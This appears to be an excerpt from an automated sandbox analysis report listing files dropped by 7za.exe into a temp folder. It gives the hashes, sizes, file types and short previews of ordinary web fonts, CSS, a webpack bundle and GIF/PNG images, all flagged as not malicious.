      MD5:9ED298542B45EF98492E159F68E89F48
      SHA1:C4521D9A5DFF8A71804C40A909378E8EB5BD66C2
      SHA-256:B9BD51AE6CCC7DF20417E0EF341295B86BF8F74F6E235EE99DDEFD675806F47F
      SHA-512:1C7D5B378D6C627FBBEF864035B157C3E7647B699A50D64F6EBF22FAAC38BF774E0C025BC8DD4ECC9BDE7B377B729BC89BF6FBAC4D2409240E2D03753CFE680E
      Malicious:false
      Reputation:low
      Preview:/* Generated by Font Squirrel (https://www.fontsquirrel.com) */..@font-face {. font-family: 'Open Sans';. src: url('./fonts/Open-Sans/opensans-regular-webfont.eot');. src: url('./fonts/Open-Sans/opensans-regular-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/Open-Sans/opensans-regular-webfont.ttf') format('truetype');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'Open Sans Italic';. src: url('./fonts/Open-Sans/opensans-italic-webfont.eot');. src: url('./fonts/Open-Sans/opensans-italic-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/Open-Sans/opensans-italic-webfont.ttf') format('truetype');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'Open Sans Bold';. src: url('./fonts/Open-Sans/opensans-bold-webfont.eot');. src: url('./fonts/Open-Sans/opensans-bold-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/Open-Sans/opensans-bold-webfont.ttf') format('truetype
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2224
      Entropy (8bit):4.909725268337795
      Encrypted:false
      SSDEEP:
      MD5:487B553F5F73B30B8D565DF02B4103CC
      SHA1:6DEFCF202CE7A04F2BEA8AAAC8BB01ED44407FA5
      SHA-256:931071422410D73D9D7D3583745E476EAC23C0CAC5FBE344F8436499EE40AC46
      SHA-512:5A94DA5D685F6E74F6576C179B8B65B719727163AFEBF24557B5F23718A8C034F5E2782FF33021C4D029ABAA7CDF464AD0A49CCE0602B31191B3B6B642BDA9CE
      Malicious:false
      Reputation:low
      Preview:/* Generated by Font Squirrel (https://www.fontsquirrel.com) on June 9, 2016 */..@font-face {. font-family: 'Proxima Nova Light';. src: url('./fonts/ProximaNova/proxima_nova_light-webfont.eot');. src: url('./fonts/ProximaNova/proxima_nova_light-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/ProximaNova/proxima_nova_light-webfont.woff') format('woff'),. url('./fonts/ProximaNova/proxima_nova_light-webfont.ttf') format('truetype'),. url('./fonts/ProximaNova/proxima_nova_light-webfont.svg#webfontregular') format('svg');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'Proxima Nova Regular';. src: url('./fonts/ProximaNova/proxima_nova_regular-webfont.eot');. src: url('./fonts/ProximaNova/proxima_nova_regular-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/ProximaNova/proxima_nova_regular-webfont.woff') format('woff'),. url('./fonts/ProximaNova/proxima_nova_regular-webfont.ttf') format('truetype')
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1001
      Entropy (8bit):4.73336522371631
      Encrypted:false
      SSDEEP:
      MD5:F5F5B5E4955262430E7B496247425D2D
      SHA1:D4BEA186A0D525CE3060E8DD7901311AE4A0735A
      SHA-256:2537EFE2FB974F58CDDBC99ABFCD7AED6E9DF81992EED3E528B5F1748167B8FA
      SHA-512:16A7EC3D95ED773A0A1CE2C2DC4430677106F0D1042E34CB39ED48F4A495F637EC3EEFAD05A4EBBDDBEA71A67E933FA0B56E6BEEF69700C6E3AC9CDA9C17E7CA
      Malicious:false
      Reputation:low
      Preview:/* Generated by Font Squirrel (https://www.fontsquirrel.com) */..@font-face {. font-family: 'Roboto Regular';. src: url('./fonts/Roboto/roboto-regular-webfont.eot');. src: url('./fonts/Roboto/roboto-regular-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/Roboto/roboto-regular-webfont.ttf') format('truetype');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'Roboto Light';. src: url('./fonts/Roboto/roboto-light-webfont.eot');. src: url('./fonts/Roboto/roboto-light-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/Roboto/roboto-light-webfont.ttf') format('truetype');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'Roboto Thin';. src: url('./fonts/Roboto/roboto-thin-webfont.eot');. src: url('./fonts/Roboto/roboto-thin-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/Roboto/roboto-thin-webfont.ttf') format('truetype');. font-weight: normal;. font-style: normal;.}
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):15159
      Entropy (8bit):5.028657930739933
      Encrypted:false
      SSDEEP:
      MD5:2F4FE7647AA460B8984556A25A74C234
      SHA1:8FB2A5135E61A034ECDFEF279E92078A7B463123
      SHA-256:3F8EC31A3C08DE6C1AAC117347B1B83F391BB0A91C9DBDC57BA9D11D5BA372D5
      SHA-512:BAD4C1419E302F8E5A84C28FB0862DC56167A7353CC5420D8226883203FE03ECA7EC8A9F554CFEE560523E9EF292CC38200BCE6015C80A428CE4C05222BE3A58
      Malicious:false
      Reputation:low
      Preview:/* FIX */.html {. margin: 0px;. padding:0px;. background-color: white;. font-style:normal;. font-family: 'Proxima Nova Light', 'Segoe UI', 'Open Sans', Arial, sans-serif;. font-size: 14px;. min-width: 600px;. background-color: #f7f6f3;. height: 100%;. width: 100%;..}.body{. height: 100%;. width: 100%;. position: relative;. cursor: default;.. overflow: hidden;.. scrollbar-face-color: #E0DFDD;. scrollbar-base-color: #EBEBEB;. scrollbar-3dlight-color: #EBEBEB;. scrollbar-highlight-color: #EBEBEB;. scrollbar-track-color: #EBEBEB;. scrollbar-arrow-color: #3A4459;. scrollbar-shadow-color: #E0DFDD;. scrollbar-dark-shadow-color: #EBEBEB;.}...template-loading-screen {. position: fixed;. width: 100%;. height: 100%;. top: 0;. left: 0;. z-index: 9999;. background-color: #00456f;. background: linear-gradient(to right, #00456f 0%,#0ed7bf 100%);. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#00456f', e
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text, with very long lines (1522)
      Category:dropped
      Size (bytes):194759
      Entropy (8bit):5.085369566018644
      Encrypted:false
      SSDEEP:
      MD5:5FDAF0FD106200153F8243EBB8BC6B18
      SHA1:4B9524224954987A07FE1CE5F6F6E83BECD5A20B
      SHA-256:439BFD8BF9F9176C1757BA277850525F0ABEC59BB3EF7CD8A974A5AD1D2B3004
      SHA-512:1DB1CFCD7E8188594D5B136A479A29797CE1382C471BDD592F7F44F1026E5DA845D231EEB09AA6B1B0D36AC2329B3277EE69C9E53049F2726DF936A50B898228
      Malicious:false
      Reputation:low
      Preview:@import url(http://allfont.ru/allfont.css?fonts=lucida-console);@import url(http://allfont.ru/allfont.css?fonts=lucida-console);@import url(http://allfont.ru/allfont.css?fonts=lucida-console);@import url(http://allfont.ru/allfont.css?fonts=lucida-console);.header {. position: absolute;. top: 0;. left: 0;. right: 0;. height: 48px;. z-index: 10000;. width: 100%;. background-color: #004c80;. background: linear-gradient(to right, #004c80 0%,#08544e 100%);.}..header_logo {. padding: 0 0 0 17px;. font-size: 0px; /* fix for old ie */.}..header_logo-img {. display: none;. width: 168px;. height: 22px;. margin-right: 10px;. vertical-align: middle;. background-repeat: no-repeat;. background-position: center;. background-size: cover;. background-image: url(img/header/header-logo.png);.}.@media (-webkit-min-device-pixel-ratio: 1.25), (min-resolution: 120dpi) {. .header_logo-img {. background-image: url(img/header/header-logo$2x.png);. }.}..header_controls {. padding: 0;.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text, with very long lines (1277)
      Category:dropped
      Size (bytes):3899117
      Entropy (8bit):4.753915476639835
      Encrypted:false
      SSDEEP:
      MD5:A7AF01062EA3C1687B11930F26A6D9E8
      SHA1:B6F418996E5F6C3D7DE04B621B78DE15DCE20A35
      SHA-256:C0AE6134F693B80D71ECE89965CDE42C819E815C7218D54FCFAD0372A62DEC21
      SHA-512:8D0E40BB128BBB1F01CE38295C4C673884A7F07AEF543BB39372FB91F1AB9F20C60DEC974CB97BEB5A58ABECD7B6D137F80631C5CA39831E2B59659704634B38
      Malicious:false
      Reputation:low
      Preview:!function(modules) {. function __webpack_require__(moduleId) {. if (installedModules[moduleId]) return installedModules[moduleId].exports;. var module = installedModules[moduleId] = {. i: moduleId,. l: !1,. exports: {}. };. modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);. module.l = !0;. return module.exports;. }. var installedModules = {};. __webpack_require__.m = modules;. __webpack_require__.c = installedModules;. __webpack_require__.i = function(value) {. return value;. };. __webpack_require__.d = function(exports, name, getter) {. if (!__webpack_require__.o(exports, name)) Object.defineProperty(exports, name, {. configurable: !1,. enumerable: !0,. get: getter. });. };. __webpack_require__.n = function(module) {. var getter = module && module.__esModule ? function() {. re
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 640 x 480
      Category:dropped
      Size (bytes):51916
      Entropy (8bit):7.946803635710227
      Encrypted:false
      SSDEEP:
      MD5:ABFF7587FC0717EC0CC2E81E107B4097
      SHA1:E678C5FB905B2F44C6480FB0A1324FAAEDCBAB1B
      SHA-256:A889D76DC491E266C39F6F3F632725100EA29606E140664E8557737B9903A597
      SHA-512:9BF484B1800737E01949C5195A09B2A82E60155578FC317E03A2147D0CBADB7784028AE43E28FC20CE18E2EFBB09552D44F5F98D7C6059EC72C7D9E6180244F9
      Malicious:false
      Reputation:low
      Preview:GIF89a...................*....$f....5..1.. (#"D$!&%*2'".)H'+.2.-d.+535C4,C84.;M1=IC=;a>3=?DC@AK@:.B<ICBiD?VF?@IPMKO-L[ZPK.QjmSF.TJ.Ur#UlMW_@Xh.Y}_YZmYP.[|.[R.\..]{.`.L`oCcxsc^.d.cdg.i.Nj|.k]tli.l\.lS.lb)m..mT.n.]p|.s..t..tk.tbwuv.u^.uk.w.Nw._{.p{..{g.|. |.8}..}v.~o........n..u*....y......j.......u...>..i..........x...\..........~(...........h...................................$../.....e..%........(../......... ..)...........3..8..9......B....\..;..B....i..E.........H....K..U.............O......U..S....\....e.....W....\..\....a.......c...........j..............s....................mS...........................................................................................................................................................................!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....C..M....S.^....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 59, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3515
      Entropy (8bit):7.898330735354373
      Encrypted:false
      SSDEEP:
      MD5:C283858D15A9593AACEC23DC2BD5B880
      SHA1:5E3AF0289CED8541A282D72EC493F100530492F4
      SHA-256:57B11CE3770FBA0479784DEB6352F8821F9255740796D1CCD79199B36C208F2F
      SHA-512:17BD48DB45F661DD67A395CAEE7E0BBB249F1B8A0716797799D4EF79EFEE021C1E2C1E31C43308832F4B5BF198284BA0299E6865D9259B68784D5FC6B8A88485
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......;.......b.....sRGB........8eXIfMM.*.......i.......................................;.....Iw....1IDATx..].r......0.*.*N%.*.JR..~@.... ..4A&1!z/jo.TI"h.....B/c;...2\.E.J"f..\...`...`@..........g..}.u.......(\.) ...o.....P.....Z}..Pud.P...........T.{.s.#u..Z..b.uz....r.R...s..]...}.....(c%R.(...Z....e.\.<[.[..I........M.Yh...P...H.l.'.w....-.b.,W.p.v~{o./l..c....j...J9.........e`...._ ....x.._......}.G\(....Hyb.0$0\..I...K.._..{.[.p....[.mr.....{.uK'.1.1`......&.|....B.=.....,....=.[...c.0....u. ).$,..O......;....x.w....6.l..).m ,TV0......z....G^.&.x.a....P...a...u...&s....Jr9..@.R....+....)...#.{.h}...]..."k...t.Iv....K...{.....,..M...].Z..N......B..>cr...w.....Y.!5..F.L...Ks...k..P..x.j...ye.M/n...l.C.,..J.........w7.(.6.1.h.n.K.;_.-.fb#.....>.6.w.`...........N....Tf4...wjs.(d... ...C....H.V..M.#.Mc]'...oN`~..[B?...y.O`;....&ILV.~x..&..'?.l..o..^..T.....)1.O.s..YiP|.A......R......C8Ll\...O..!. @Jy.....i..;...E.xK.'[..o.mh
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 83 x 83, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3205
      Entropy (8bit):7.926197857969618
      Encrypted:false
      SSDEEP:
      MD5:38519658E34C96260A4CD62EB212A754
      SHA1:3C20E21415C0B2C5C9AEB2C372692FAF33EB55B1
      SHA-256:75E0BEDFDD35D39F0753790D58EB85C038D1B83B8639998850568A6100FD4FBC
      SHA-512:60B59CC97CEDEC140F86A8047366D5F47B4A3B877EF8C8C614659A0D9EC43F816ACF17A8C31EBC3A9EBDDCB621C49C5C568696A793AFEDF04C37A0F701E25C6A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...S...S......;.....sRGB........?IDATx..].t.....}$..<$....G......."...hB R.....mA.......==b-.p.....E<j.=>8.>..".Z.U% &....~w.Mv.........;s.../...s.F.:...IL....N.r.D....W...(....\..........).(0v.%dk..pJH.hbd1A.wH.?..l....4._.,..._.$U).p.....}..2.'N.i...cFE'A<..Tt.x....p.N.......XN5+.h.Qt...Yt.5.p.k..........y.c...f>....!....x)m.....B.\.Y...>.h...hnO..G!..Ly8a.S....*...<..Yz..f...IW1b.f)..|..=^/...3.....T!..r...P.\.n".XI[V...A?.7?.E...@.`D...^....).e.Gzu..........^..#. :..*h..]=.....>p...3........B+..S.JC..}...c....v...39.Oi'..k.U.[.@,.H..*....z7..6....JTN..m.j.60.........Z...z.....h...........,9.M.y.....z./..^IUKND.-.L..t^.....rD.w....l%8U40[]G.w...4......2.uN....V....+.C............+......H6Dl.+0.T..8.-L.%$...R.f.cG!.4..M.-F3...y?Qi.p .6.......>.!..:z.z...w.68..3(.x....:...2....8Y6.,.3....{.'..]...M[.HM...,...1j.@.6H..6..5....85.=.K.`...Ek.....y&...F.m....{-=:..,....N..........7....#hY...2O;]t....W..ZX..Q.z..p.....=s...\
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):6196
      Entropy (8bit):7.954561627339551
      Encrypted:false
      SSDEEP:
      MD5:6C787480F5EBC35C7AEDC8DBBC4080E9
      SHA1:51A19AE17B8E82D4283D274352DC7FE6080C5AC9
      SHA-256:6990C73EA8B51E58B1725DFF7FE04E35B6D789212ED8FF69200EC8C13675B955
      SHA-512:71AA7DD972E9B90B2BF73F769E5DE2F868F9F586FFFA8C4ED125963AC5EC8EC1894F64B2380DFDF51E557BB73032204F9A04771D139DFDE0033B2E5BD671038B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....sRGB.........IDATh...Ip..z......[.....0`...6.. ....H..).T(6.,....vl((..n.X.n.. .....cc<K.%knI.....i......}.w..9....t........q..j....E..........mbb.....P(X4....v...U.V..+m``....,..Y ..Y..........r`.J......o...?....<h..\.p8.....8....0o.V.`0hmmm.v.Z....m...s".p.....o.H...`.m|..b.h........o.mSSS.....w........ry.m..D"......t..{2..k.....^...5.@oV.o...U....w......_.......f.s....q..-...1N>..\..........m...|.A......u.$c.F6..@..1.t:m.~.....K.,...mrr........"8,...^0..p(.rJ.9..^|.........^.......M.69..9......z`.=k/......[644..;{.........{...P.0I.3@.E....<f.p.....].b.3.'.x...~...U..z..........N.>m.7o...;.D?&...3..t.m......y...Y..#...J.,...5|..'.tQ......0F.Hh?t.=......~p....Yw...=.?..lx.<....8........u...s0.gR...?lO?........".gn.....s.9.b.s..9?.....e..k>....... o...7e..<......r.....k.<.^..Y.g../.p..z.<@...._t.`...kL...Z...>.$..x.]...A..wL...b.....G..g....y....W..C..}..\5....sD4....1.W.......1.`....._>s.;.h..k.<.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 52 x 52, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3477
      Entropy (8bit):7.937690859856463
      Encrypted:false
      SSDEEP:
      MD5:A565BCED22AB2C8E51D5CF3845C36E41
      SHA1:6243579805CA8154750028615FD8A07C425A8958
      SHA-256:2A913BE9AE0C72073963755F0FCF9EE7786DEAB5D1C0E1895717F8228B9ED0B2
      SHA-512:CDE8A11D17F5E9C120BC7EF060D62B620A7EE34653C6693A15E3A0B483024432F8DAE52D163CEC9C4CA930653F64F4B48F8EF69BFD2D72261A9DD04D7F3BEC81
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...4...4......x......sRGB........OIDATh..ZYo[...n.....]..y..8...Y..I..(....>4...(....%.....i..E..M..Y.gO...x.m..X.(Q..R.o.K_I.Dz..(^.3w..93..e.Cnp...tP....K.e.G.zf$4..h4&..E.XD...8].)...%..RZ..<...G.%S.T.,A$....t......J..1......p.e.Z.fK..mo..G...:_.....,i.1.C....Q....O...[]2.3-..........r..@.F..-P.Dr.....$..+D.'....}r.N...........^(v.S..~{.d.8.]....U.N.....,g>.x|.zeM.9..".;...[d_{..K\b...F.}...M.......]..Yl....9...s.294+#]....vJ........<#s..+.r.....6dv...Y6..@.<......yO..;nf./..|A..q.*C....._^..a..ZG.....g....r....!...d.2.....g....... \...JR.S.z4$.."b.[..-...D...k.:..<.N...F..F<...M....&..w....)"..t..Q....r.ogRF.e.y.}r......C0.&|B)......J.....}r...*.U!.']..r...I.y ....GP.....:.='..v....q..z$.[?i..\.Yw\).@z.....L2kb..c.qlHF{.).C.T4..^"..y....0.t8.4;W...Pd.....\.....H....T..h..,.....s..N....n..uR.\.$...<.a....,$.'.k....9;&..|Q..J.Es."....6y...t......U..~[.<..}.1....@t...>.g.]...A.!....r.Ok.#.....HB...b^.=7!e....*.{v\..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 113 x 136, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):24880
      Entropy (8bit):7.9824140329159645
      Encrypted:false
      SSDEEP:
      MD5:67BAF8D3800AB1D44F5207ABE0AE045E
      SHA1:D8EB670289A9CC22A6721FC0D2F4C51211FBC29C
      SHA-256:B3378884BE87E5C04E1EF8730C257136FDF0870A8A179AF46EE1CB13522CFE55
      SHA-512:BEE4B5932001FBAD0ACB26C21513D59471A0F214596445AB1B365A96CD956BB590697FF2E163B6C16F289AC7D47374A657365069D7263C104CE453C2FF4C515C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...q.................sRGB........8eXIfMM.*.......i...........................q...................T..@.IDATx...p\.u......p8.A..A..(..(..(J.lK.,G..;.....q.?..I.$[Y...c_j.z...V*.Ij.q*.8..g+."."[.lY.~Q.)..(..@..A....3...~?..g. (Y..;....}o.8}..>.O..=..?..j.....'...D>.J....B.....Cs.f.5]..r...|.%..^..T.8.L..N.K3...|.<3.f...oq.D"...B._..-....s{F.N7.vT...f"..l6.5.........k..t.H...I..5..n-.lV...G.4...Y]l...|.W......5.` .j^TO..J......au.z.u.%]Z.J.....+.....&.l`....f.Y.N..n.zE..w%{..;1......Ll6.....e.OuumhJ.6.D.Qw51.R..ZM.&..l&...g3.c....i.w...a8|.....Z......%..j:...'..\....nK$B...'y..f.m.fr....fwrw"..t.L.^...8|...q.1...2..3/u.(...A"-M;&2..R...j,s..f..j:.xf...>.11......O-.?"ce.S...ue..NvAL.V,WLB...L:..z.'..j....<CZAK.....1..d'../I:......W6.w....(.'f..T2.7.;.v..}.T.E.yH...H..<..W.Ce..m....E<Y.J2smV.q...TF4BI..*.Z.4}..+..~.D../...1.7.....e.L.Sk`..W*.D...o..I....8.....3.-...A.6.,i..@G...."3...Y,Wg...v...|.....d.g...b..~0..ugnI%R.0Z....aq.r9.[.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 83 x 83, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2887
      Entropy (8bit):7.926382436891858
      Encrypted:false
      SSDEEP:
      MD5:FFA861195147AF50A0FCDC5CD10D47A7
      SHA1:5DAFD876AE29243FE59A79BAE1DA47CB66A18FFB
      SHA-256:5E032634EE7D893DCA3F45B643F8AADCC622CCA7C89535FB418FF597811AD031
      SHA-512:0719E8DF4472E23FA15EB19D915166D7F9342AEA265AF22591C55DFBAED03CC570080AAC69211680AE3C02D099CF234353A12D9512ABA1EA210DE310F22103FC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...S...S......;.....sRGB.........IDATx..].pT.....%...A.-B;..iq.N.a4.y.&.....8N:....M..F:..:.%.8...t...v...AV...2..Z....bi-.G.$...w...+ww....g.....|.........*...q.).%$.......Y$h6.E...#...,.g.<IB...o..?..........K..m........7..Of...9.y.4.I.>.....E......yH....................4g?d....r...y.E..a.c..i..F..r..M....i....k.oB.}.&^3$.A..=.....73$fX.n0.5z.$n..q.a..OT....P:...r".-..f}.u...C.1..A`.*.....6.7h..v.).......R.`*.4...y......i...)u.:..C..2......~_I......H.r..H. ...i.(..BTB=...e....t.J.L...kF..t...z.*J..P...../.....F.m..;..t.,.:L....*:..c+.Z.....wYi...LgF].t.l...M..P.;....r7Q.t)8....l.\......H. .......f*....}6f.!..9f..^.q#-\.W.z$U.R..i.S.2s.Y*N.;..jz`~*......X!...H....A..Ku.....x..=WBO..R..@2.%.7.....}0Q..H... +.U...,..z...n...s7*,KTi..r...@...K..ys..R.y.. .FR#h>..0.'..'KfP..@.2.s!m..A.D.&a...xC...P.pa0&.P.HK</.`.....A...D..'..S_...nJ... h}<..`.../..w..d....Y.n...E..W....]K...W...!]m..(:3oqf...I.......G...t.......LEf.B...v
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 83 x 83, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1823
      Entropy (8bit):7.827027766703762
      Encrypted:false
      SSDEEP:
      MD5:47E37ADBA581BD1FC4355FDEAFEEFC7F
      SHA1:66BB1F1C76767FE36B7E00E25FFD03406B645A40
      SHA-256:D1CE0F13ECE06C9B4EA6C5AAFD2DA6D314EDA0637BEA82869268673B7E1CDB3E
      SHA-512:CB7C154953D518FED4AF7F734E08D0C9166B1321BA78A6E90745830A3340C7C4B29E0A088115F270D7FB11B3753FC8015B6257A2F6B1E98E7506B1A3332E2FED
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...S...S......;.....sRGB.........IDATx.....6..........[..N.cg?..Q.DR.EJ.3{,B......[.c....sw}....w..u....W....g%.<........<..D........(-.&..(..``.....;.tuZ..Ob.x.....#~.%.i.F.........{k!........`R./...b.8.OR9.bT.L6.`^y..HR.{...........p;...........&...*..i.R..N..w~.,V.:...&0g.s.. ......bT..{...!..6....3.u..'j.5....|=..m...X.KG..0}1..Z.O..c'<.L.~.|..=..y..(.:.L.q6k^......4..i.@l....v.....bp.L..p..v.....f.5pmvrHp.V...C.I...VJq0/;.&..J.gw.....^...;..{.G.w'l{.....z.A..B.q....+...'.........K.W(.x.=...?..........W|........[.u.......d?.P).....6Z......'o'..`..2.M.9x....@.....3.C.Wx.Lcm(....s..J".B...5i...Dh.g_bR."...9.RxR.`..cTs.(....g.;..bCI2y..dc.P.......:.h8.....(.v..B.K!......r.*;..6...K....`|yd>.....i..`..E..I.g...J...+.'w.q.#@>.....l..?.Z0....7.D..~......v..eJIe4.8... .V!T6..Hh...HK..9.....%0.$M..~7..%...q..F....r>..l(J.y.t..|...!@...h8....Tw(a.F..Z.ss)j..0.Q.s....>.{.}...s&.,*.-....X~C2.K!..9.........y)..c.H..qp~.&..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 192 x 184, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):7701
      Entropy (8bit):7.9458455365430725
      Encrypted:false
      SSDEEP:
      MD5:598DA5ACF7E9F7E9C6389DE8E35DE43C
      SHA1:5F8E83F8AC84685D7002B0DEBEA85600FE674CB1
      SHA-256:E9C53F692CE5D2DC9F8C82D93A758835DD96E5C41CC44B386A3F0A1E2C493CB2
      SHA-512:6388F7585CDE0353A90A93D0BDF5E3978A056D72608337E6AD5013895DEE876F4A24104364A3A4CA48FAF821B70A6D2835E58780F4FA4DAC08BB1CE3433B22CF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....................sRGB........8eXIfMM.*.......i.............................................Q......IDATx..].x....43:mK6.e.....!..A@...2..[2..wa......,..M8.$.&k..$....b...$|....l...0...X........A3..u.tW...S.}%.T.W.._.UW.....K9A.....).2B.s$Y9Q.I.B........G.^V.^S8GD....y..|>.>....Sz.B.}2.1.w.}....M#...`.....^.+).rQ.k.E.j...r<O.>..y........P..B..8.{....5.<.V:bvN......d<..j....%Q.X....R.x.'~........O.....+.f.o.E..y.{..A.....9.Eow,^}.@.{.A.A.N..?.}.x-.}&....q..,...Q...L..z.9...W..J..~$J..,..dK.yaJSR. .....+.p.....y.........'.b......}.../..9..\.}p#KB.....Y...\...G...>..+sA.y.......M..9.II..B....pS[...Q.{6[Q.{..U.n.....T2.Z1.....%....q....aJ..D..e.%%.$P.(......W.;k.].D!...a.;.. ..y..O8.....yb....s......$.AU..C?..8.cH.qI!m.V..z.........f.Bn... ...8..:.R...`..S<...'*..h..N"..0A.p|.G .....{.Wm...u..#.....e.q$....w..(X....:/.._...^..%.5.....Q...UI!.rD...g.o.f..............h...&x.......9A....H$r;\.L...a..1...<T3..n.........A.:%ZC..3.?.G.KY.(6..?
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 83 x 83, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2872
      Entropy (8bit):7.911859555273791
      Encrypted:false
      SSDEEP:
      MD5:D1DCD4973C3D58FE8758240035B3601A
      SHA1:79332D3BFFA54CAD259F805D06E7B87D90D59513
      SHA-256:08505ABC1FBF36DA82B90045C184E2A7CA876EEC98829A1D6C622F18C33C0C60
      SHA-512:0D9B757A3B6A450A108410200A01036CD82227B7EF36C66070C2075A5A2B7585C97267608BC2EAE5047CDAB885D196E8CFC3B39565DE819B6FB8F9C76595E175
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...S...S......;.....sRGB.........IDATx..].p.U....4IK...`.:4.G.N..#...d..d...... ......cAFG.J....2....2...J..@.I...*V.?.@....I....y{........w.k.4}...........cT..y.%.M~..v5qj ...b.....Y5....?z...._!.FH./......_..-esXI.7w.S.5..&.o.(.....3..{.. ...w.ph......x.'.y7..k....r./.._....dl'.n.6G...q]-U....K.).o.+.q..$1....~....h.l.........D?.~E..$.....R..K..^.I..j0..$o.&n...>W..O...#.....@......j.b.@.1.......S..}i....Shc.i.>......48.....:...|.).F}b.L..a.)i}.....F....#G...-.. ...?~.`..R.......o....U....j.........1tQ.}..W...}.....[.7.w..B..:.....Z:..{A...f"..........<.......m.?..v6....p.....f...p...............].>t6..~?.......0..E~.V^.v--].g.z4_...,....~.,.$..(..$...`&.X.`..G.....#..G...........O..Z.I..x..]J.1.s......d..dm...d:gwQS.#....f"y+*..U.MgTE1z..w..M7..H..Q..V.i..%x.?.s...?]3....r....i&....6O...|s5..{M......]F-..NY.`...*..2.fc...$.....].....*.c..)..L.;..J...]l2.DU..X..iF..Z~.8.....ct.5......C.;V!c.5.da.$.2.6...}._...2...P.G.bt
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 480 x 480, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):180648
      Entropy (8bit):7.991455972685609
      Encrypted:true
      SSDEEP:
      MD5:6B23DEEB91538DF9F5F3B7CAF8722626
      SHA1:950EF4C4BB9FC4614EDECC69B8FDDD39DFC255F9
      SHA-256:2272991FC33620380904D7FC49C8283F76F2D6D470997332C975AF75BCFE79FB
      SHA-512:3F3282F3C23D793D782502C14885A49737612AE6957F0CC5F867C3DA84B8C38B15FDCC2EEC4E51DFB9C2750C00E33B1675654844227DB8265C91AEE4524C29FF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............}......sRGB........8eXIfMM.*.......i.............................................cJ..@.IDATx....fGu.y.../....b..........+.,..YC....fHH.".r.$v^3y8....=Np...3$.&....l.c..c0. .@..VK......}.o....}............=..v..U..9..v.:..........................................................................................................................................................................................................................................................................................................................D.L<......'Q......ML..\...gNMN.NNN......T.Mu........n{w{..eo.7......^....n..e-4.4.|u5.......Z..ei.c...p....../l.~n.;61..>..=m{0...&v......`ww.......^....X..%..w?..C...Lvgo..|d~z....3..\wbng.u....[..........M.M._.......l......>rr........3.6.................'...89)x.|y...HAZ..E...[.f#..'....n3V.y.G<.L8.4.:{.'.B......3f../OO.....{.&..^~.;-..........}\U[......._;..........eg01u....{....Mt.S..@.`......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 349 x 348, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):85609
      Entropy (8bit):7.987226853029843
      Encrypted:false
      SSDEEP:
      MD5:11EB4D0237FF9BD348DFBB9A54A4B7DE
      SHA1:883F2A3C2B95453092E456792EA20091AE477A46
      SHA-256:79B891496137F1C727956588B46C305A43A47A6D11F17DAE04C3BB83403CDBA0
